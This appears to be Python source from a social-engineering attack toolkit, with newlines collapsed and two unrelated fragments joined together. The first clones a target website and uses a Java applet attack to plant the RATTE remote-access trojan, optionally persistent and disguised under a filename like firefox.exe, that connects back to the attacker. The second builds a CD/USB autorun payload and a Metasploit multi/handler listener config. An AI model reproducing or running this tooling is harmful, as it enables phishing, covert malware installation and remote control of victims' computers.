def main(): valid_site = False valid_ip = False valid_persistence = False input_counter = 0 site_input_counter = 0 #pause=raw_input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while valid_site != True and site_input_counter < 3: website = raw_input( core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse.urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning( "I can't determine the fqdn or IP of the site. Try again?" ) site_input_counter += 1 else: if site_input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?") sleep(4) return else: core.print_warning( "I couldn't determine whether this is an http or https site. Try again?" ) site_input_counter += 1 #core.DebugInfo("site.scheme is: %s " % site.scheme) #core.DebugInfo("site.netloc is: %s " % site.netloc) #core.DebugInfo("site.path is: %s " % site.path) #core.DebugInfo("site.params are: %s " % site.params) #core.DebugInfo("site.query is: %s " % site.query) #core.DebugInfo("site.fragment is: %s " % site.fragment) while valid_ip != True and input_counter < 3: ipaddr = raw_input( core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 #javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int( raw_input( core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int( raw_input( core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) except ValueError: #core.print_info("Port set to default of 80") javaport = 80 #javaport=80 try: ratteport = int( raw_input( core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Port must not be equal to javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int( raw_input( core.setprompt( ["9", "2"], "Port RATTE Server should listen on [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt( ["9", "2"], "Should RATTE be persistentententent [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe = raw_input( core.setprompt([ "9", "2" ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr, ratteport, persistent, customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Starting java applet attack...") java_applet_attack_tw(website, javaport, "reports/", ipaddr) fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r") for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath, definepath, ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
# if using pdf payload elif trigger == 2: payload = "template.pdf" elif trigger == 3: payload = "openthis.wab" else: payload = "" filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload)) core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'") core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.") core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun") # if we want to launch payload and automatically create listener if trigger in [1, 2, 3]: choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]") if choice1.lower() == "yes" or choice1.lower() == "y": # if we used something to create other than solo.py then write out the # listener if not os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ open(os.path.join(core.setdir, "payload.options")) as fileopen: for line in fileopen: line = line.split(" ") filewrite.write("use multi/handler\n") filewrite.write("set payload {0}\n".format(line[0])) filewrite.write("set lhost {0}\n".format(line[1]))